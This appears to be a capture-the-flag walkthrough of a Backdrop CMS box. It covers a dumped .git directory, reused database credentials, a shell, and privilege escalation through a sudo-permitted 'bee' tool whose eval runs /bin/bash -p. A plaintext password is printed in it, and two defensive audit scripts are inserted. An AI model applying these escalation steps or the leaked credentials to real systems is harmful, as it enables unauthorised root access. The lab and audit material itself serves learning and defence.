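Directory scanning turned up an exposed .git directory, so I dumped it with GitHacker.

In the files directory I found what is probably a webshell written by another player; better not to use it directly.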

robots.txt

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used: http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/robotstxt.html
#
# For syntax checking, see:
# http://www.robotstxt.org/checker.html

User-agent: *
Crawl-delay: 10
# Directories
Disallow: /core/
Disallow: /profiles/
# Files
Disallow: /README.md
Disallow: /web.config
# Paths (clean URLs)
Disallow: /admin
Disallow: /comment/reply
Disallow: /filter/tips
Disallow: /node/add
Disallow: /search
Disallow: /user/register
Disallow: /user/password
Disallow: /user/login
Disallow: /user/logout
# Paths (no clean URLs)
Disallow: /?q=admin
Disallow: /?q=comment/reply
Disallow: /?q=filter/tips
Disallow: /?q=node/add
Disallow: /?q=search
Disallow: /?q=user/password
Disallow: /?q=user/register
Disallow: /?q=user/login
Disallow: /?q=user/logout

Nothing of interest turned up in the git history.

In the settings I found the MySQL username and password.

update.settings.json contains a user.

Tried logging in with that combination: it worked.
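
A defender-side check for the exposure described above, added here as an example and not part of the original writeup: it walks a served directory and reports version-control metadata and database credentials written inline in settings files. The one-line DSN form, the file extensions, the function names and the sample tree are assumptions, and the sample content is constructed.

```python
import os, re, tempfile

# Assumed credential form: a one-line DSN such as scheme://user:password@host/db.
DSN_RE = re.compile(r"\b(mysql|pgsql)://([^:/\s'\"]+):([^@\s'\"]+)@([^/\s'\"]+)")
VCS_DIRS = {".git", ".svn", ".hg"}
TEXT_EXT = (".php", ".inc", ".json", ".env")

def audit_webroot(root):
    """Return sorted (kind, location, detail) findings for a served directory."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in [d for d in dirnames if d in VCS_DIRS]:
            rel = os.path.relpath(os.path.join(dirpath, d), root)
            findings.append(("vcs-metadata", rel, "repository metadata inside the served tree"))
            dirnames.remove(d)  # no need to walk the object store
        for name in (n for n in filenames if n.endswith(TEXT_EXT)):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    m = DSN_RE.search(line)
                    # Skip commented-out template lines; report the user, never the password.
                    if m and not line.lstrip().startswith(("//", "#", "*")):
                        loc = f"{os.path.relpath(path, root)}:{lineno}"
                        findings.append(("inline-db-credential", loc,
                                         f"{m.group(1)} user={m.group(2)} password=<redacted>"))
    return sorted(findings)

def build_sample_tree(root):
    """Constructed sample: a docroot with a .git directory and a settings file."""
    os.makedirs(os.path.join(root, ".git", "objects"))
    with open(os.path.join(root, ".git", "HEAD"), "w") as fh:
        fh.write("ref: refs/heads/master\n")
    with open(os.path.join(root, "settings.php"), "w") as fh:
        fh.write("<?php\n// $database = 'mysql://user:pass@localhost/db';\n"
                 "$database = 'mysql://cms_user:CONSTRUCTED-PASSWORD@127.0.0.1/cms';\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for finding in audit_webroot(tmp):
            print(finding)
```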

Once inside, first look for file upload / command execution points -> modules (plugins) first.

Modules for Backdrop CMS | Backdrop CMS

10.10.11.58

Reverse shell

Logged in as johncusack directly using the database password.

python3 -c 'import pty;pty.spawn("/bin/bash")'
johncusack@dog:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/su
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/fusermount
/usr/bin/at
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/chsh
/usr/bin/mount
/usr/bin/passwd
/usr/bin/sudo
johncusack@dog:~$ sudo -l
sudo -l
[sudo] password for johncusack: BackDropJ2024DS2024

Matching Defaults entries for johncusack on dog:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
(ALL : ALL) /usr/local/bin/bee
johncusack@dog:~$
<?php
/**
 * @file
 * A command line utility for Backdrop CMS.
 */

// Exit gracefully with a meaningful message if installed within a web
// accessible location and accessed in the browser.
if (!bee_is_cli()) {
  echo bee_browser_load_html();
  die();
}

// Set custom error handler.
set_error_handler('bee_error_handler');

// Include files.
require_once __DIR__ . '/includes/miscellaneous.inc';
require_once __DIR__ . '/includes/command.inc';
require_once __DIR__ . '/includes/render.inc';
require_once __DIR__ . '/includes/filesystem.inc';
require_once __DIR__ . '/includes/input.inc';
require_once __DIR__ . '/includes/globals.inc';

// Main execution code.
bee_initialize_server();
bee_parse_input();
bee_initialize_console();
bee_process_command();
bee_print_messages();
bee_display_output();
exit();

/**
 * Custom error handler for `bee`.
 *
 * @param int $error_level
 *   The level of the error.
 * @param string $message
 *   Error message to output to the user.
 * @param string $filename
 *   The file that the error came from.
 * @param int $line
 *   The line number the error came from.
 * @param array $context
 *   An array of all variables from where the error was triggered.
 *
 * @see https://www.php.net/manual/en/function.set-error-handler.php
 * @see _backdrop_error_handler()
 */
function bee_error_handler($error_level, $message, $filename, $line, array $context = NULL) {
  require_once __DIR__ . '/includes/errors.inc';
  _bee_error_handler_real($error_level, $message, $filename, $line, $context);
}

/**
 * Detects whether the current script is running in a command-line environment.
 */
function bee_is_cli() {
  return (empty($_SERVER['SERVER_SOFTWARE']) && (php_sapi_name() == 'cli' || (is_numeric($_SERVER['argc']) && $_SERVER['argc'] > 0)));
}

/**
 * Return the HTML to display if this page is loaded in the browser.
 *
 * @return string
 *   The concatentated html to display.
 */
function bee_browser_load_html() {
  // Set the title to use in h1 and title elements.
  $title = "Bee Gone!";
  // Place a white block over "#!/usr/bin/env php" as this is output before
  // anything else.
  $browser_output = "<div style='background-color:white;position:absolute;width:15rem;height:3rem;top:0;left:0;z-index:9;'>&nbsp;</div>";
  // Add the bee logo and style appropriately.
  $browser_output .= "<img src='./images/bee.png' align='right' width='150' height='157' style='max-width:100%;margin-top:3rem;'>";
  // Add meaningful text.
  $browser_output .= "<h1 style='font-family:Tahoma;'>$title</h1>";
  $browser_output .= "<p style='font-family:Verdana;'>Bee is a command line tool only and will not work in the browser.</p>";
  // Add the document title using javascript when the window loads.
  $browser_output .= "<script>window.onload = function(){document.title='$title';}</script>";
  // Output the combined string.
  return $browser_output;
}
johncusack@dog:/$ /usr/local/bin/bee
/usr/local/bin/bee
🐝 Bee
Usage: bee [global-options] <command> [options] [arguments]

Global Options:
--root
Specify the root directory of the Backdrop installation to use. If not set, will try to find the Backdrop installation automatically based on the current directory.

--site
Specify the directory name or URL of the Backdrop site to use (as defined in 'sites.php'). If not set, will try to find the Backdrop site automatically based on the current directory.

--base-url
Specify the base URL of the Backdrop site, such as https://example.com. May be useful with commands that output URLs to pages on the site.

--yes, -y
Answer 'yes' to questions without prompting.

--debug, -d
Enables 'debug' mode, in which 'debug' and 'log' type messages will be displayed (in addition to all other messages).


Commands:
CONFIGURATION
config-export
cex, bcex
Export config from the site.

config-get
cget
Get the value of a specific config option, or view all the config options in a given file.

config-import
cim, bcim
Import config into the site.

config-set
cset
Set the value of an option in a config file.

CORE
download-core
dl-core
Download Backdrop core.

install
si, site-install
Install Backdrop and setup a new site.

DATABASE
db-drop
sql-drop
Drop the current database and recreate an empty database with the same details. This could be used prior to import if the target database has more tables than the source database.

db-export
dbex, db-dump, sql-export, sql-dump
Export the database as a compressed SQL file. This uses the --no-tablespaces option by default.

db-import
dbim, sql-import
Import an SQL file into the current database.

INFORMATION
help
Provide help and examples for 'bee' and its commands.

log
ws, dblog, watchdog-show
Show database log messages.

status
st, info, core-status
Provides an overview of the current Backdrop installation/site.

version
Display the current version of Bee.

MISCELLANEOUS
cache-clear
cc
Clear a specific cache, or all Backdrop caches.

cron
Run cron.

maintenance-mode
mm
Enable or disable maintenance mode for Backdrop.

PROJECTS
disable
dis, pm-disable
Disable one or more projects (modules, themes, layouts).

download
dl, pm-download
Download Backdrop contrib projects.

enable
en, pm-enable
Enable one or more projects (modules, themes, layouts).

projects
pml, pmi, project, pm-list, pm-info
Display information about available projects (modules, themes, layouts).

uninstall
pmu, pm-uninstall
Uninstall one or more modules.

ROLES
permissions
pls, permissions-list
List all permissons of the modules.

role-add-perm
rap
Grant specified permission(s) to a role.

role-create
rcrt
Add a role.

role-delete
rdel
Delete a role.

role-remove-perm
rrp
Remove specified permission(s) from a role.

roles
rls, roles-list
List all roles with the permissions.

STATE
state-get
sg, sget
Get the value of a Backdrop state.

state-set
ss, sset
Set the value of an existing Backdrop state.

THEMES
theme-admin
admin-theme
Set the admin theme.

theme-default
default-theme
Set the default theme.

UPDATE
update-db
updb, updbst, updatedb, updatedb-status
Show, and optionally apply, all pending database updates.

USERS
user-add-role
urole, urol
Add role to user.

user-block
ublk
Block a user.

user-cancel
ucan
Cancel/remove a user.

user-create
ucrt
Create a user account with the specified name.

user-login
uli
Display a login link for a given user.

user-password
upw, upwd
Reset the login password for a given user.

user-remove-role
urrole, urrol
Remove a role from a user.

user-unblock
uublk
Unblock a user.

users
uls, user-list
List all user accounts.

ADVANCED
db-query
dbq
Execute a query using db_query().

eval
ev, php-eval
Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.

php-script
scr
Execute an arbitrary PHP file after bootstrapping Backdrop.

sql
sqlc, sql-cli, db-cli
Open an SQL command-line interface using Backdrop's database credentials.

I noticed there is a command-execution option.

Simply executing /bin/bash -p does the job.
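
A defender-side audit for the sudo rule and help text above, added here as an example and not code from the original writeup or the bee project: it parses `sudo -l` output and a tool's help text, then flags rules that run as root with no argument restriction when the tool advertises code-execution or query subcommands. The sample strings are constructed from the output shown on this page; the function names and keyword patterns are assumptions.

```python
import re
# Constructed sample input from the sudo rule and bee help shown above; patterns are assumptions.
SUDO_L = "User johncusack may run the following commands on dog:\n    (ALL : ALL) /usr/local/bin/bee\n"
BEE_HELP = """ADVANCED
db-query
dbq
Execute a query using db_query().

eval
ev, php-eval
Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.

MISCELLANEOUS
cache-clear
cc
Clear a specific cache, or all Backdrop caches.
"""
RULE = re.compile(r"^\s*\(([^)]*)\)\s*(?:\w+:\s*)*(/\S+)(.*)$")
RISKY = [("code-exec", re.compile(r"arbitrary PHP", re.I)),
         ("db-access", re.compile(r"execute a query|sql command-line", re.I))]

def parse_sudo_rules(text):
    """Yield (runas_user, command, args) for each rule line of `sudo -l` output."""
    for line in text.splitlines():
        m = RULE.match(line)
        if m:
            yield m.group(1).split(":")[0].strip(), m.group(2), m.group(3).strip()

def risky_subcommands(help_text):
    """Map subcommand -> risk label from name / aliases / description blocks."""
    found = {}
    for block in help_text.split("\n\n"):
        lines = [l.strip() for l in block.splitlines() if l.strip() and not l.isupper()]
        for label, pattern in RISKY:
            if len(lines) >= 2 and pattern.search(lines[-1]):
                found.setdefault(lines[0], label)
    return found

def audit(sudo_text, help_by_command):
    """Flag root rules with no argument restriction whose tool has risky subcommands."""
    findings = []
    for runas, command, args in parse_sudo_rules(sudo_text):
        if runas in ("ALL", "root") and args == "":
            risky = risky_subcommands(help_by_command.get(command, ""))
            findings += [(command, sub, label) for sub, label in sorted(risky.items())]
    return findings

if __name__ == "__main__":
    print(audit(SUDO_L, {"/usr/local/bin/bee": BEE_HELP}))
```

A sudoers command listed without arguments accepts any arguments, which is why an empty argument field is treated as unrestricted here.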